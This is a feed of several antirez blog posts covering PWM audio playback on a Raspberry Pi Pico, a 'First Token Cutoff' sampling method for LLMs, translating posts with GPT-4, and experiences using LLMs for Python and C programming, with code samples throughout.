<antirez> http://antirez.com Description pending Playing audio files in a Pi Pico without a DAC http://antirez.com/news/143 http://antirez.com/news/143 Wed, 06 Mar 2024 10:52:34 +0000
One of the cool things one wants to do with an MCU like that, is generating some sound. The most obvious way to do this is using the built-in PWM feature of the chip. The GPIOs can be configured to just alterante between zero and one at the desired frequency, like that:

from machine import Pin, PWM
pwm = PWM(Pin(1))
pwm.freq(400)
pwm.duty_u16(1000)

Assuming you connected a piezo to GND and pin 1 of your Pico, you will hear a square wave sound at 400hz of frequency. Now, there are little sounds as terrible to hear as square waves. Maybe we can do better. I’ll skip all the intermediate steps here, like producing a sin wave, and directly jump to playing a wav file. Once you see how to do that, you can easily generate your own other waves (sin, noise, envelops for such waveforms and so forth).

Now you are likely asking yourself: how can I generate the complex wave forms to play a wav file, if the Pico can only switch the pin high or low? A proper non square waveform is composed of different levels, so I would need a DAC! Fortunately we can do all this without a DAC at all, just a single pin of our Pico.

### How complex sound generation works

I don’t want to cover too much background here. But all you need to know is that, if you don’t want to generate a trivial square wave, that just alternates between a minimum and maximum level of output, you will need to have intermediate steps, like that:

S0: #
S1: ####
S2: ######
S3: #######
S4: ########

And so forth, where S0 is the first sample, S1, the second sample, …

Each sample duration depends on the sampling frequency, that is how many times every second we change (when playing) or sample (when recording) the audio wave. This means that to play a complex sound, we need the ability of our Pico pin to output different voltages.

There is a trick to do this with the Pico just using PWM, that is to use a square wave with a very high frequency, but with a different duty cycle for the different voltages we want to generate. So we set a very very high frequency output:

pwm.freq(100000)

Then, if we want to produce the S0 sample, we set the duty cycle (whose value is between 0 and 65535) to a small value. If we want to produce the S1 sample, we use a higher value, and so forth. In sequence we may want to do something like that:

pwm.duty_u16(3000) # S0
pwm.duty_u16(12000) # S1
pwm.duty_u16(18000) # S2
pwm.duty_u16(21000) # S3
pwm.duty_u16(24000) # S4

The duty cycle is how much time the pin is set to 1 versus how much time the pin is set to 0. A duty cycle of 65535 means 100% of time pin high. 0% means all the time low. All this, while preserving the set alternating frequency. So if we zoom like if we have an oscilloscope, we can see what happens during S2 and S3 sample generation:

S2:
######################
#
#
#
#
######################
#
#
#
#

While S3 will be like:
######################
######################
#
#
#
######################
######################
#
#
#

The pin goes up and down with the same frequency, but in the case of S3 it stays up more. This will produce a higher average voltage. This allows us to approximate our wave.

### Convert and play a WAV file

In order to play a wav file, we have to convert it into a raw format that is easy to read using MicroPython. I downloaded a wav file saying “Oh no!” from SoundCloud. So my conversion will look like this:

ffmpeg -i ohno.wav -ar 24000 -acodec pcm_u8 -f u8 output.raw

Note that we converted the file to 8 bit audio (256 different output levels per sample). Anyway our PWM trick is not going to approximate the different levels so well, and we are resource constrained. You can try with 16 bit as well, but I got decent results like this.

Then, upload the output.raw file on the device via mpremote:

mpremote cp output.raw :

Now write a file called “play.py” or as you wish, with this content:

from machine import Pin, PWM

pwm = PWM(Pin(1))
pwm.freq(100000)

f = open("output.raw","rb")
buf = bytearray(4096)
while f.readinto(buf) > 0:
for sample in buf:
pwm.duty_u16(sample<<8)
x=1
x=1
x=1
x=1
x=1
f.close()

What we are doing here is just getting the file, 4096 samples per iteration, then “playing” it by setting different PWM duty cycles one after the other, according to the samples values. The problem is, in our PCM file we have 24000 samples per second (see ffmpeg command line). How can be sure that it matches the MicroPython speed? well, indeed it is not a perfect match, so I added “x=1” statements to delay it a bit to kinda match the pitch that looked correct.

Oh, and if you are wondering what the sample<<8 thing is, this is just to rescale a 8 bit sample to the full 16 bit precision needed to set the PWM duty cycle.

The downside of all this is that it will take your program busy while playing. I didn’t test it yet, but MicroPython supports threading, so to have a thread playing the audio could be the way to go.

### Bonus point: sin wave sound generation

# Sin wave
wave=[]
wave_samples = 40
pwm.freq(100000)
for i in range(wave_samples):
x = i/wave_samples*3.14*2
dc = int((1+math.sin(x))*65000)
wave.append(dc)
print(wave)

for i in range(1000):
for dc in wave: pwm.duty_u16(dc) Comments]]>
http://antirez.com/news/143
First Token Cutoff LLM sampling http://antirez.com/news/142 http://antirez.com/news/142 Fri, 12 Jan 2024 16:49:37 +0000
Today one of the most used ones, more or less the default, is called top-p: it is a form of nucleus sampling where top-scoring tokens are collected up to a total probability sum of “p”, then random weighted sampling is performed.

In this blog post I’ll examine why I believe nucleus sampling may not be the best approach, and will show a simple and understandable alternative in order to avoid the issues of nucleus sampling. The algorithm is yet a work in progress, but by publishing it now I hope to stimulate some discussion / hacking.

## There is some gold in the logits

Despite the fact that LLM logits are one of the few completely understandable parts of the LLM inner working, I generally see very little interest in studying their features, investigating more advanced sampling methods, detecting and signaling users uncertainty and likely hallucination. Visualizing the probabilities distribution for successive tokens is a simple and practical exercise in order to gain some insights:

!~!

In the image we can see the top 32 candidate tokens colored by probability (white = 0, blue = 1), the selected token and the rank of the selected token (highest probability = 0, the previous one = 1, and so forth).

In the above example, the Mistral base model knows the birth and death dates of Umberto Eco, so it confidently signals the most likely token with most of the total probability. Other times the model is more perplexed because either there are multiple ways to express the continuation of the text, or because it is not certain about certain facts. Asking the date of a name which birthday was not learned during training produces a different distribution of token probabilities.

However in general what we want to avoid is to select suboptimal tokens, putting the LLM generation outside the path of minimum perplexity and hallucination. Nucleus sampling fails at doing this because accumulating tokens up to “p”, depending on the distribution may include tokens that are extremely weaker than the first choice. Consider, for instance, the “writer” token in the image above. Umberto Eco was a writer, indeed. The token associated with writer, while it is not scoring with a very high value, it is still a lot more above the second choice. Yet a p of 0.3 may accumulate the second token with a low value like 0.01, and yield it with some single-digit probability, with the risk of putting the generation in the wrong path.

Instead, in the case of the following token, “who”, there are multiple choices with a relatively similar score, that could be used for alternative generations.

## Making use of the avalanche effect

A key observation here is that to select too weak tokens for the sake of variability is not a good deal: even if we only exploit generations moments where there are a few good candidates in order to diversify the output, the avalanche effect will help us: the input context will change, thus the output of the LLM will be perturbed, with the effect of making it more likely to produce some alternative version of the text.

## First Token Cutoff (FTC) algorithm

DISCLAIMER: The algorithm described here hasn’t undergone any scientific scrutiny. I experimented a couple of days with different sampling algorithms having “bound worst token” properties, and this one looks like the best balance between applicability, results and understandability.

The algorithm described here can be informally stated as follows:

- When the LLM is strongly biased towards a given candidate, select it.
- When there are multiple viable candidates, produce alternatives.
- The selection of the worst possible token should be bounded to a given amount.

Past work, like Tail Free Sampling, also noted that a selection should be made across a small set of high-quality tokens emitted by the LLM. However in TFS such set is identified by performing the derivative to select a cluster corresponding to the tokens that don’t see a steep curve after which the token quality decreases strongly.

In the algorithm proposed here, instead, we want the selection to follow a more bounded and understandable cut-off relative to the highest scoring token T0, attributing to T0 a special meaning compared to all the other tokens: the level of certainty the LLM has during the emission of such token (a proxy of perplexity, basically). Thus the algorithm refuses every token that is worse than a given percentage if compared to T0.

The cut off percentage, that can have a value from 0 to 1, is called “co”.
An example and viable “co” could be 0.5.

This is how the algorithm works:

1. Compute softmax() of logits.
2. Sort tokens by probability.
3. Given T0, the probability of the best token, compute the ratio of all the other tokens as:

r = 1 - (T[i] / T0)

4. Select only tokens for which r <= co
5. Perform weighted random pick among the selected tokens.

Note that in this way, regardless of the fact that tokens may have a smooth monotonically decreasing value, there is a hard limit to the tokens we can include in the set of possibilities. Instead with other methods that try to identify high-score clusters, this is not the case.

## Practical examples

One reason why nucleus top-p sampling does not look to fail catastrophically in the practice, is that often times the first token probability is very high, thus when the perplexity is low, and also all the times casually we don’t collect and then pick low-quality tokens, the generation continues along a sensible path.

Things are more problematic when there are successive tokens with probabilities like:

0.25, 0.14, 0.01

With a p=0.4, we could collect the third low quality token and yield it ~3% probability.

Now consider First Token Cutoff with a co value of 0.5 (token can be up to 50% worse than first one):

The second token r value is:

r[t1] = 1-(0.14/0.25) = 0.44 # 0.44 <= 0.5, this token is accepted
r[t2] = 1-(0.01/0.25) = 0.96 # 0.96 > 0.5, this token is refused

## Example output

Outputs of Mistral base model (no instruct) with co=0.7 for the prompt “Sorted sets are”.
The outputs are three successful outputs not cherry picked for quality.

1. Sorted sets are a powerful data structure in Redis. They can be used to store sorted lists, to store unique values, to store scores for ranking, and to store a sorted list of sorted sets.

2. Sorted sets are a very powerful data structure. They allow you to store data in a way that makes it easy to find the highest or lowest values in the set, and they also allow you to sort the data. This can be useful for many different tasks, such as ranking users by their score, or finding the most popular items in a database.

3. Sorted sets are a very powerful data structure that can be used to solve many different problems. The most common use case is to store a list of unique elements, each of which has an associated value. For example, you could use a sorted set to store the names of all the people in your family, with their ages as the associated values.

## Why understandability matters

Sampling parameters are among the few things that the end user of LLMs, or the API user, must tune. Trial and error is often needed, however to have a single tunable parameter for which there is an immediate real-world description and intuition helps a lot. Moreover "co" is a linear parameter, so it's particularly simple to reason about VS parameters like temperature, or even "p" of top_p that while linear strongly depends on the distribution shape of the logits.

## Future work

I’m at the start of my investigations, so I’ll study and evaluate better this algorithm. More than anything else, I would love to see more interest in sampling algorithms and more interest in moving forward from top-p alike approaches.

There are perhaps interesting information to collect from the logits distribution. For example it is likely that a linear probe could be able to learn when the hidden layers of an LLM are dealing with some factual information. This, with the token perplexity, could be used in order to show the user of LLMs that some part of the output is likely wrong. In general visualizing tokens probabilities distribution is very informative and in some way allows to touch with bare hands how LLMs work and what are the candidates at each step.

## Reference implementation

logits = mx.softmax(logits)
np_logits = np.array(logits) # MX -> NumPy
np_logits = np_logits.flatten()
sorted_indices = np.argsort(np_logits)
sorted_indices = sorted_indices[::-1]

co = 0.7
j = 1
t0 = np_logits[sorted_indices[0]]
while 1 - (np_logits[sorted_indices[j]] / t0) < co and j < len(np_logits):
j += 1
accepted_logits = []
for i in range(0,j):
accepted_logits.append(float(np_logits[sorted_indices[j]]))
accepted_logits = mx.array(accepted_logits)

idx = mx.random.categorical(accepted_logits)
idx = int(np.array(idx)) # Convert zero-dim array to scalar
token_id = sorted_indices[idx]


## Credits

These experiments were really simple to perform thanks to the MLX library from Apple, and the cool and smart developers working incessantily at it. MLX is extremely accessible, like it should be: after all LLMs are imprescrutable, but the inference itself is a simple process. Comments]]>
http://antirez.com/news/142
Translating blog posts with GPT-4, or: on hope and fear http://antirez.com/news/141 http://antirez.com/news/141 Tue, 09 Jan 2024 21:28:15 +0000
1. Think about what I want to say for weeks or months. No, I don’t spend weeks focusing on a blog post, the process is exactly reversed: I write blog posts about things that are so important to me to be in my mind for weeks.

2. Then, once enough ideas collapsed together in a decent form, I write the blog post in 30 minutes, often without caring much about the form, and I hit “publish”. This process usually works writing the titles of the sections as I initially just got the big picture of what I want to say, and then filling the empty paragraphs with text.

Why I take step 2 so lightly? Because I got other stuff to do, and if blogging would take more than 30/60 minutes I would rather not blog at all, or blog less, or suffer doing it: all things I want to avoid at all costs. Blogging is too important to let it go. It’s better, for me, to give up on the form.

At the same time, this is why many of my blog posts, regardless of the content that may be more or less informative, more or less useful, are generally badly written. I hope that the fact I can write well enough in my mother language in some way it is still visibile in my English posts, but I have the feeling that the extremely limited vocabulary I possess, the grammar errors, the sentence construction that oftentimes I just take from Italian and turn into English, all those limits irremediably damage the reading experience.

This is why, for the first time, to write my blog post about LLMs and programming I tried a different approach: I wrote the post in Italian and I translated it to English using GPT-4. The result is a much better blog post than usually, I believe, and the total time to write it was comparable to writing it in English, because writing in Italian in a bit faster, and this compensated the time needed to cut & paste the sections in GPT-4, wait for the output, check that it matched the Italian meaning, and doing a few corrections and rewriting when needed.

It shocks me that I can hear my voice when reading the translation. It does not sound written by somebody else. And, interestingly, the tools to spot GPT generated texts tell me that the post was written “100% by human”. At the same time the process may look a bit synthetic: even worse I may lose confidence writing English if I continue along this path, so I’m still not sure how this blog will be written in the future. One thing is sure: the post you are reading is not just written by myself, but as the tradition in this blog demands, not even re-read or corrected if not for a quick second pass. This way you can see what my written English really is, and if you are curious, compare it with the post about LLMs. The difference is not less than huge.

Another point of view on the matter could be that my true voice is the one of the translated blog post, so writing in English is the real bluff here. Because the translated post is more representative of my lexical ability in my mother tongue, and not of the reduced one I can feature when writing in English. Maybe it captures more shades of what I really want to say. But then one could go deeper in arguments about what style really is. Is it more about sentence construction, and the way you put down your ideas, or is it a lot more about the vocabulary used, the exact words and adjectives selected to provide a given image and meaning? Probably both, and the two things are quite an inseparable whole.

Anyway the simple fact that now, in 2024, I finally have this choice, fulls me of hope and fear. Hope for the possibilities the humanity will have, with machines that can talk. And fear about the potential AI has to make everybody lazy, no longer willing to do things as hard as learning a new language. Comments]]>
http://antirez.com/news/141
LLMs and Programming in the first days of 2024 http://antirez.com/news/140 http://antirez.com/news/140 Tue, 02 Jan 2024 10:56:14 +0000
Meanwhile, I am certainly not a novice in programming. I am capable of writing code without any aid, and indeed, I do so quite often. Over time, I have increasingly used LLMs to write high-level code, especially in Python, and much less so in C. What strikes me about my personal experience with LLMs is that I have learned precisely when to use them and when their use would only slow me down. I have also learned that LLMs are a bit like Wikipedia and all the video courses scattered on YouTube: they help those with the will, ability, and discipline, but they are of marginal benefit to those who have fallen behind. I fear that at least initially, they will only benefit those who already have an advantage.

But let's take it step by step.

# Omniscient or Parrots?

One of the most concerning phenomena of this new wave of novelty and progress in machine learning is the limited ability of AI experts to accept their limited knowledge. Homo sapiens invented neural networks, and then, even more crucially, an algorithm to automatically optimize the parameters of a neural network. Hardware has become capable of training increasingly larger models, and using statistical knowledge about the data to be processed (the priors) and through a lot of trial and error for successive approximations, architectures have been discovered that work better than others. But all in all, neural networks remain quite opaque.

In the face of this inability to explain certain emerging capabilities of LLMs, one would have expected more caution from scientists. Instead, many have deeply underestimated LLMs, saying that after all they were nothing more than somewhat advanced Markov chains, capable, at most, of regurgitating extremely limited variations of what they had seen in the training set. Then this notion of the parrot, in the face of evidence, was almost universally retracted.

At the same time, much of the enthusiastic masses attributed to LLMs supernatural powers that do not exist in reality. Unfortunately, LLMs can, at most, interpolate in the space represented by the data they have seen during training: and this would already be a lot. In reality, their ability to interpolate is limited (but still astonishing, and also unexpected). Oh, if only the largest LLMs of today could interpolate continuously in the space bounded by all the code they have seen! Even if they would not be able to produce true novelties, they would be able to replace 99% of programmers. The reality is more modest, as it almost always is. An LLM is certainly capable of writing programs that it has not seen in that exact form, showing a certain ability to blend different ideas that appeared in the training set with a certain frequency. It is also clear that this ability has, at the moment, deep limits, and whenever subtle reasoning is required, LLMs fail disastrously. Yet they represent the greatest achievement of AI, from its dawn to today. This seems undeniable.

# Stupid but All-Knowing

It's true: LLMs are capable, at most, of rudimentary reasoning, often inaccurate, many times peppered with hallucinations about non-existent facts. But they have a vast knowledge. In the field of programming, as well as in other fields for which quality data are available, LLMs are like stupid savants who know a lot of things. It would be terrible to do pair programming with such a partner (for me, pair programming is terrible even in the most general terms): they would have nonsensical ideas and we would have to continuously fight to impose our own. But if this erudite fool is at our disposal and answers all the questions asked of them, things change. Current LLMs will not take us beyond the paths of knowledge, but if we want to tackle a topic we do not know well, they can often lift us from our absolute ignorance to the point where we know enough to move forward on our own.

In the field of programming, perhaps their ability would have been of very little interest up to twenty or thirty years ago. Back then you had to know a couple of programming languages, the classic algorithms, and those ten fundamental libraries. The rest you had to add yourself, your own intelligence, expertise, design skills. If you had these ingredients you were an expert programmer, able to do more or less everything. Over time, we have witnessed an explosion of frameworks, programming languages, libraries of all kinds. An explosion of complexity often completely unnecessary and unjustified, but the truth is that things are what they are. And in such a context, an idiot who knows everything is a precious ally.

Let me give you an example: my experiments on machine learning were carried forward for at least a year using Keras. Then for various reasons, I switched to PyTorch. I already knew what an embedding or a residual network was, but I didn't feel like studying PyTorch's documentation step by step (as I had done with Keras, which I learned when ChatGPT did not yet exist). With LLMs, it was very easy to write Python code that used Torch. I just needed to have clear ideas about the model I wanted to put together and ask the right questions.

# Time for Examples

I'm not talking about easy things like: "Hey, what's the method of class X to do Y"? If it were just for that, one might be tempted to agree with those who are skeptical about LLMs. What the more complex models are capable of is much more elaborate. Until a few years ago, it would have been pure magic. I can tell GPT4: look, this is the neural network model I have implemented in PyTorch. These are my batches. I would like to resize the tensors so that the function that emits the batches is compatible with the input of the neural network, and I would like to represent things in this particular way. Can you show me the code needed to do the reshaping? GPT4 writes the code, and all I had to do was test in the Python CLI if the tensors really have the dimensions that are useful to me and if the data layout is correct.

Here's another example. Some time ago I had to implement a BLE client for certain ESP32-based devices. After some research, I realized that multi-platform Bluetooth programming bindings are more or less all unusable. The solution was simple, write the code in Objective C using macOS's native API. So, I found myself having to deal with two problems at the same time: learning the cumbersome BLE API of Objective C, full of patterns that I consider nonsensical (I'm a minimalist, that kind of API is at the opposite end of the spectrum of what I consider "good design") and at the same time remembering how to program in Objective C. The last time I had written a program in Objective C was ten years ago: I didn't remember the details of the event loop, memory management, and much more.

The final result is this code here, not exactly beautiful, but it does what it has to do. I wrote it in an extremely short time. It would have been impossible otherwise.

https://github.com/antirez/freakwan/blob/main/osx-bte-cli/SerialBTE.m

The code was written mostly by doing cut & paste on ChatGPT of the things I wanted to do and didn't quite know how to do, so they didn't work properly. Having the LLM explain to me what the problem was and how to solve it. It's true that the LLM didn't write much of that code, but it's also true that it significantly accelerated the writing. Would I have been able to do it without ChatGPT? Certainly yes, but the most interesting thing is not the fact that it would have taken me longer: the truth is that I wouldn't even have tried, because it wouldn't have been worth it. This fact is crucial. The ratio between the effort and the benefit of writing such a program, secondary to my project, would have been inconvenient. Moreover, this had a much more useful secondary collateral effect than the program itself: for that project I modified linenoise (one of my libraries for line editing) so that it works in multiplexing.

Another example, this time less about code writing and more about data interpretation. I wanted to set up a Python script using a convolutional neural network I found online, but it was quite lacking in documentation. The network had the advantage of being in ONNX format, so I could easily extract a list of inputs and outputs, and their assigned names. I only knew one thing about this convnet: it detected certain features within an image. I didn't know the input image format and size, and especially, the network's output was far more complicated than I imagined (I thought it was a binary classifier: is the observed image okay or does it have problems? Two outputs, but there were hundreds). I began by copy-pasting the ONNX network metadata output into ChatGPT. I explain to the assistant what little I know about the network. ChatGPT hypothesizes how the inputs are organized, and that the outputs are probably normalized boxes indicating parts of the images corresponding to potential defects, and other outputs indicating the likelihood of these defects. After a few minutes of back-and-forth, I had a Python script capable of network inference, plus the necessary code to transform the starting image into the tensor suitable for input, and so on. What struck me about that session was ChatGPT finally “understood” how the network functioned once it observed the raw output values (the logits, basically) on a test image: a series of floating-point numbers provided the context to identify the exact output details, the normalization, if the boxes where centred or if the left-top corner was specified, and so forth.

# Disposable Programs

I could document dozens of such cases I've narrated above. It would be pointless, as it's the same story repeating itself in more or less the same way. I have a problem, I need to quickly know something that *I can verify* if the LLM is feeding me nonsense. Well, in such cases, I use the LLM to speed up my need for knowledge.

However, there are different cases where I let the LLM write all the code. For example, whenever I need to write a more or less disposable program. Like this one:

https://github.com/antirez/simple-language-model/blob/main/plot.py

I needed to visualize the loss curve during the learning of a small neural network. I showed GPT4 the format of the CSV file produced by the PyTorch program during learning, and then I requested that if I specified multiple CSV files on the command line, I didn’t want the training and validation loss curves of the same experiment anymore, but a comparison of the validation loss curves of different experiments. The above is the result, as generated by GPT4. Thirty seconds in total.

Similarly, I needed a program that read the AirBnB CSV report and grouped my apartments by month and year. Then, considering the cleaning costs, and the number of nights per booking, it would do statistics on the average rental price for different months of the year. This program is extremely useful for me. At the same time, writing it is deadly boring: there's nothing interesting. So I took a nice piece of the CSV file and did copy-paste on GPT4. I wrote to the LLM what the problem was to be solved: the program worked on the first try. I show it to you in full below.

```python
import pandas as pd
pd.set_option('display.max_rows', None)
df = pd.read_csv('listings.csv')
reservations = df[df['Type'] == 'Reservation']
reservations['Start Date'] = pd.to_datetime(reservations['Start Date'])
reservations['Year'] = reservations['Start Date'].dt.year
reservations['Month'] = reservations['Start Date'].dt.month
reservations['Nightly Rate'] = (reservations['Amount'] - reservations['Cleaning Fee']) / reservations['Nights']
all_listings = reservations['Listing'].unique()
all_years = reservations['Year'].unique()
all_months = range(1, 13)
index = pd.MultiIndex.from_product([all_listings, all_years, all_months], names=['Listing', 'Year', 'Month'])
all_data = pd.DataFrame(index=index).reset_index()
merged_data = pd.merge(all_data, reservations, on=['Listing', 'Year', 'Month'], how='left')
average_nightly_rates = merged_data.groupby(['Listing', 'Year', 'Month'])['Nightly Rate'].mean().fillna(0)
print(average_nightly_rates)
```

To understand exactly how to group the data, which were otherwise quite scattered and disordered, requires some simple reasoning: it’s not a problem that an LLM could solve simply by regurgitating something that approximates the language it has seen. GPT4 has certainly observed similar programs during its training, but almost certainly has not seen a program that had to group things in the exact way I asked for and in a CSV file with that specific format. This shows (in my opinion) that LLMs can interpolate to some extent within the space outlined by the different programs in the training set.

Writing this type of program would be, in my opinion, an imprudent use of my time. The fact that an LLM can do it for me certainly speeds up my ability to produce code in a rather direct way: I can focus on the things that matter.

# When things don't go as they should: System Programming

Despite my success with LLMs and programming, when I write a program in C, I almost always end up using LLMs only as a more convenient form of documentation. I am an expert in system programming, and in that context, LLMs would be useful to me only if they were capable of complex reasoning: in this scenario, they almost always fail.

Let's start with the prompt of this experiment:

Outline the requirements of a nice, small but working C implementation of a bloom filter. Focus on the important aspects of the hashing function. Then write it, in good quality C.

Also consider that your example implementation should be sized to store 100,000 elements, with a false positive probability of at most 5%. The elements added are null-terminated strings.

Here’s the output:

```c
#include
#include
#include
#include

#define N 100000 // Number of elements
#define P 0.05 // False positive probability
#define M (int)(-(N * log(P)) / (log(2) * log(2))) // Size of bit array
#define K (int)(M / N * log(2)) // Number of hash functions

unsigned char bitArray[M / 8 + 1];

void setBit(int n) {
bitArray[n / 8] |= 1 << (n % 8);
}

int getBit(int n) {
return bitArray[n / 8] & (1 << (n % 8));
}

// Basic hash functions (for demonstration purposes)
int hash1(char *str) {
int hash = 5381;
int c;
while ((c = *str++))
hash = ((hash << 5) + hash) + c;
return abs(hash % M);
}

int hash2(char *str) {
unsigned long hash = 0;
int c;
while ((c = *str++))
hash = c + (hash << 6) + (hash << 16) - hash;
return abs(hash % M);
}

void add(char *str) {
setBit(hash1(str));
setBit(hash2(str));
// Add more hash functions if needed
}

int is_in(char *str) {
return getBit(hash1(str)) && getBit(hash2(str));
// Check more hash functions if used
}

int main() {
char *testStr = "testString";
add(testStr);

if (is_in(testStr)) {
printf("%s is probably in the set.\n", testStr);
} else {
printf("%s is definitely not in the set.\n", testStr);
}

return 0;
}
```

The implementation produced by GPT4 is not exactly brilliant. Bloom filters are quite widespread. It’s not such an exotic data structure. However, it’s clear that writing a decent bloom filter requires a greater capacity for abstraction: for example, there’s the problem of finding an effective way to hash the same string N times, and being certain that the hashes are sufficiently decorrelated.

Yet if you explicitly ask GPT4 to modify the hashing function so that it produces N decorrelated outputs, its proposed solution is significantly more acceptable:

```c
unsigned int hash(const char* str, unsigned int hash_id) {
unsigned int hash = 5381;
int c;
while ((c = *str++)) {
hash = ((hash << 5) + hash) + c + hash_id;
}
return hash % BF_SIZE;
}
```

If it had come up with this idea on its own, it would have written the bloom filter differently, setting K bits at a time using a single hashing function.

GPT4 was able to perform, in isolation, the task of writing an appropriate and more generic hashing function. But in the larger project of writing a bloom filter, it failed to show sufficient reasoning ability, and instead spat out two different but similar hashing functions: this is what one would expect from a poorly written article example on bloom filters.

The current weak reasoning abilities of Large Language Models, combined with a possible scarcity of sources on the subject, and even worse, potentially many low-quality sources, collectively result in this meager outcome. Yet, this is not an isolated case. The few times I attempt to use LLMs in the realm of algorithmic or system programming, the results are extremely poor, even when the expected reasoning abilities are not greater than what LLMs seem to possess in contexts like Python programming.

At the same time, GPT-4 is capable of decompiling the function it produced (in a separate session), and also precisely understand its purpose:

https://chat.openai.com/share/f54b64d7-d19a-4be4-8f10-08553aa812f1

Therefore, stating that there are no uses in system programming contexts is certainly inaccurate.

One interesting and pretty much expected thing is that, in these cases, the difference between smaller and larger models is indeed significant. Let’s see how two local models fare.

For instance, Mixtral, the MoE of Mistral, responded to the same question as follows:

```c
unsigned int hash(const char* str, unsigned int hash_id) {
unsigned int hash = 5381;
int c;
while ((c = *str++)) {
hash = ((hash << 5) + hash) + c;
}
return hash + hash_id;
}
```

Clearly, adding `hash_id` only at the end is an extremely poor solution. Mixtral is an excellent model for many uses, but as for the already weak reasoning capabilities of LLMs, the rule so far is certainly: larger is better.

This is a chat with the local LLM deepseek-coder, quantized to 4 bits as I don’t have enough RAM to use the model at higher precision. Yet, being 34 billion parameters large, its reasoning capabilities on this matter seem quite advanced. Here’s the log of the chat (conducted with llama.cpp):

> I have a hash function that should output N distinct hashes for the same data. However, I'm seeing a very poor distribution of the produced hashes as I change the value of hash_id:

unsigned int hash(const char* str, unsigned int hash_id) {
unsigned int hash = 5381;
int c;
while ((c = *str++)) {
hash = ((hash << 5) + hash) + c;
}
return hash + hash_id;
}

Maybe the salting strategy I'm using is poor? How could I change it?

[Deep-seek coder reply]

A possible issue with your implementation is that you're simply adding `hash_id` to the end of the hash. This can potentially lead to a poor distribution, especially if `hash_id` is too large or is not evenly distributed.

Consider using bitwise operations for mixing the `hash_id` in. Here is an example with XOR:

```c
unsigned int hash(const char* str, unsigned int hash_id) {
unsigned int hash = 5381;
int c;
while ((c = *str++)) {
hash = ((hash << 5) + hash) ^ c + hash_id; // Using XOR to mix in the hash_id
}
return (hash ^ hash_id); // Mixing the hash_id one more time at the end
}
```

This will spread `hash_id` throughout your hashes better than simply adding it, which can lead to less uniform distribution. [Snipped… the actual reply contained more informative stuff]

Not bad for a model running on my MacBook M1 Max. It also mixed the sums with XORs. In this case, the model was certainly helped by the fact that I provided clues about the problem to solve, but it was the model that identified what the real source of the trouble was, and the proposed alternative is valid. Something like the above is not within the reach of any book, documentation, or Google search. And as primitive, a result of interpolation, or however you want to perceive it, the model has performed some form of reasoning, if by reasoning, in this specific case, we accept the identification of the origin of a problem and its potential solution. However one wants to think about LLMs, stating that they are not helpful for programmers is extremely rash.

At the same time, however, my experience over the past few months suggests that for system programming, LLMs almost never provide acceptable solutions if you are already an experienced programmer. Let me show you another real world example. My current project, ggufflib, involves writing a library that reads and writes GGUF format files, which is the format in which llama.cpp loads quantized models. Initially, to understand how the quantization encodings worked (for speed reasons the bits of each quant are stored in fancy ways), I tried using ChatGPT, but then I resolved to reverse engineer llama.cpp's code: it was much faster. An LLM that can decently assist a system programmer, if it sees the data encoding “struct” declaration and the decoding function, should be able to reconstruct the data format documentation. The functions of llama.cpp were small enough to fit entirely in the context of GPT4, yet the output was completely useless. In these cases, things are done as in the past: paper and pen, reading the code, and seeing where the bits that the decoder extracts are registered.

Let me explain better the above use case so that you can try it yourself, if you wish. We have this structure from llama.cpp implementation.

// 6-bit quantization
// weight is represented as x = a * q
// 16 blocks of 16 elements each
// Effectively 6.5625 bits per weight
typedef struct {
uint8_t ql[QK_K/2]; // quants, lower 4 bits
uint8_t qh[QK_K/4]; // quants, upper 2 bits
int8_t scales[QK_K/16]; // scales, quantized with 8 bits
ggml_fp16_t d; // super-block scale
} block_q6_K;

Then there is this function that is used to perform the dequantization:

void dequantize_row_q6_K(const block_q6_K * restrict x, float * restrict y, int k) {
assert(k % QK_K == 0);
const int nb = k / QK_K;

for (int i = 0; i < nb; i++) {

const float d = GGML_FP16_TO_FP32(x[i].d);

const uint8_t * restrict ql = x[i].ql;
const uint8_t * restrict qh = x[i].qh;
const int8_t * restrict sc = x[i].scales;
for (int n = 0; n < QK_K; n += 128) {
for (int l = 0; l < 32; ++l) {
int is = l/16;
const int8_t q1 = (int8_t)((ql[l + 0] & 0xF) | (((qh[l] >> 0) & 3) << 4)) - 32;
const int8_t q2 = (int8_t)((ql[l + 32] & 0xF) | (((qh[l] >> 2) & 3) << 4)) - 32;
const int8_t q3 = (int8_t)((ql[l + 0] >> 4) | (((qh[l] >> 4) & 3) << 4)) - 32;
const int8_t q4 = (int8_t)((ql[l + 32] >> 4) | (((qh[l] >> 6) & 3) << 4)) - 32;
y[l + 0] = d * sc[is + 0] * q1;
y[l + 32] = d * sc[is + 2] * q2;
y[l + 64] = d * sc[is + 4] * q3;
y[l + 96] = d * sc[is + 6] * q4;
}
y += 128;
ql += 64;
qh += 32;
sc += 8;
}
}
}

If I ask GPT4 to write an outline of the format used, it struggles to provide a clear explanation of how the blocks are stored on the lower / upper 4 bits of “ql” depending on the weight position. For this blog post, I also tried asking it to write a simpler function that shows how data is stored (maybe it can’t explain it with words, but can with code). The produced function is broken in many ways, the indexes are wrong, the 6-bit -> 8-bit sign extension is wrong (it just casts to uint8_t), and so forth.

Btw, this is the code that I ended writing myself:

} else if (tensor->type == GGUF_TYPE_Q6_K) {
uint8_t *block = (uint8_t*)tensor->weights_data;
uint64_t i = 0; // i-th weight to dequantize.
while(i < tensor->num_weights) {
float super_scale = from_half(*((uint16_t*)(block+128+64+16)));
uint8_t *L = block;
uint8_t *H = block+128;
int8_t *scales = (int8_t*)block+128+64;
for (int cluster = 0; cluster < 2; cluster++) {
for (uint64_t j = 0; j < 128; j++) {
f[i] = (super_scale * scales[j/16]) *
((int8_t)
((((L[j%64] >> (j/64*4)) & 0xF) |
(((H[j%32] >> (j/32*2)) & 3) << 4)))-32);
i++;
if (i == tensor->num_weights) return f;
}
L += 64;
H += 32;
scales += 8;
}
block += 128+64+16+2; // Go to the next block.
}
}

From the function above, I removed what was the actual contribution of this code: the long comments documenting the exact format used by llama.cpp Q6_K encoding. Now, it would be immensely useful if GPT could do this for me, and I bet it’s just a matter of months, because these kind of tasks are within what can be reached without any breakthrough, just with a bit of scaling.

# Putting Things in Perspective

I regret to say it, but it's true: most of today's programming consists of regurgitating the same things in slightly different forms. High levels of reasoning are not required. LLMs are quite good at doing this, although they remain strongly limited by the maximum size of their context. This should really make programmers think. Is it worth writing programs of this kind? Sure, you get paid, and quite handsomely, but if an LLM can do part of it, maybe it's not the best place to be in five or ten years.

